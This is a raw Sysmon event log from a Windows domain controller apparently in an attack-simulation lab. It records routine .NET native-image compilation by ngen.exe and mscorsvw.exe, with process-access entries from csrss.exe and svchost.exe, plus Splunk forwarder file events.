b9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023455Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.030{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27F-60D3-B805-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023454Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:11.030{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27F-60D3-B805-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023453Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.030{4DB9351A-A27E-60D3-B705-00000000CF01}6304NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KDQVTN4XI4\SrpUxSnapIn.ni.dll.auxMD5=883998006193734CB5F193AA8F53C9A3,SHA256=ECB630E2700A1DF970DEF693EA3FECF956D310CD6D7686AE65BAAD6603CAE64B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023452Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.030{4DB9351A-A27E-60D3-B705-00000000CF01}6304NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KDQVTN4XI4\SrpUxSnapIn.ni.dllMD5=D7EC1FDEA05B74AC18016CA3D2F3821F,SHA256=1F20CC7DAEBCA7732D3B3088A56CD6176E94DEA5E7BC965690D841070B855C55,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023500Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.670{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2A653AD70FF9DF86A6F55A14055B761,SHA256=6A5532A3C03D6C39F9B6591DC894FD91F5C6BBA2AD39CDCC30EA41DDA9EBA272,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023499Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.670{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D5F9DCAEF504FC473DEA150EFF702C4D,SHA256=3950E5C0C1EC4EE62A9680B4CD3EA280272A0DCCDAA8D2BC01D86C4889588EBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023498Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:12.342{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A280-60D3-C005-00000000CF01}6624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023497Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.326{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A280-60D3-C005-00000000CF01}6624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023496Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:12.326{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A280-60D3-C005-00000000CF01}6624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023495Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.326{4DB9351A-A280-60D3-BF05-00000000CF01}6728NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5LHE2E6NX6\System.Data.DataSetExtensions.ni.dll.auxMD5=3014C72050FF75BF0836AAB7DC0DE2AD,SHA256=1EC5A380DB071E8C1559C5005EE29CC78AA3A97EAAD29F933E3D8339FDB1ACDF,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023494Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.326{4DB9351A-A280-60D3-BF05-00000000CF01}6728NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5LHE2E6NX6\System.Data.DataSetExtensions.ni.dllMD5=C179D64F8D1D8E2EE3529996C4A84CEE,SHA256=4C509155E68E6EA6D9EF00FC8F39D3AEFD940149EE92E1550D183A575DBA4D2B,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023493Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.295{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A280-60D3-BF05-00000000CF01}6728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023492Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.280{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A280-60D3-BF05-00000000CF01}6728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023491Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:12.280{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A280-60D3-BF05-00000000CF01}6728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023490Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.280{4DB9351A-A280-60D3-BE05-00000000CF01}7116NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\G070MYOJCS\System.ComponentModel.Composition.Registration.ni.dll.auxMD5=39A991F1C4FC98AC336BA4513B9E1FEA,SHA256=F3CE2B333FE03655222DF90C03E85D82C13D6996F69C14E95404ED8AF8BCF992,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023489Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.280{4DB9351A-A280-60D3-BE05-00000000CF01}7116NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\G070MYOJCS\System.ComponentModel.Composition.Registration.ni.dllMD5=2E1EF7D6FC2EAFED0E5A4348DAE8AC90,SHA256=B36DEBC127BA86FAE7EDC46786053DF717CF9C79D304B7206D881D1D0170C414,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023488Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.248{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A280-60D3-BE05-00000000CF01}7116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023487Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.233{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A280-60D3-BE05-00000000CF01}7116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023486Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:12.233{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A280-60D3-BE05-00000000CF01}7116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023485Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.233{4DB9351A-A280-60D3-BD05-00000000CF01}296NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\77G6FMF9S5\System.ComponentModel.Composition.ni.dll.auxMD5=CE96DF3905D1CC6A23A7C86C14A3FAE5,SHA256=9C47A9286B4EF00BB5B06C6CF0AF516CB854DBB939C1F9D8DB6905544AE7C390,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023484Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.233{4DB9351A-A280-60D3-BD05-00000000CF01}296NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\77G6FMF9S5\System.ComponentModel.Composition.ni.dllMD5=F28B29BD6402529446D2DADF82B5F9BC,SHA256=DE27F8F39BD1742CAE3BD069FD651768F6D0EBDB75630056E94E0CC4F713E553,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023483Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.155{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A280-60D3-BD05-00000000CF01}296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023482Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.139{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A280-60D3-BD05-00000000CF01}296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023481Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:12.123{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A280-60D3-BD05-00000000CF01}296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023480Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.123{4DB9351A-A280-60D3-BC05-00000000CF01}6456NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PZUWZE71KD\System.AddIn.Contract.ni.dll.auxMD5=14AA707DD901610E1474784BD6EEBF65,SHA256=744A49325F1DCAC920DF84764653DA4D58651FADDC55BDE70C20B7F54B0EE5BF,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023479Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.123{4DB9351A-A280-60D3-BC05-00000000CF01}6456NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PZUWZE71KD\System.AddIn.Contract.ni.dllMD5=5C88EB5B9E8D05EF1C24574FF136A366,SHA256=F0752917AE1CF55D24FF1BF630FEF3134E3836D6FDFCD3D26B4600B3209AAA7F,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023478Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.108{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A280-60D3-BC05-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023477Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.076{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A280-60D3-BC05-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023476Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:12.076{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A280-60D3-BC05-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023475Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.076{4DB9351A-A27F-60D3-BB05-00000000CF01}5160NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5XCNLRDOU3\System.Activities.Presentation.ni.dll.auxMD5=2B5E75F067843DA9580B2C8B0A76B163,SHA256=E77CA6194248AB3769AF5D880204C71411CE5FEB8CECF00A82B7798DDA227187,IMPHASH=00000000000000000000000000000000falsetrue 
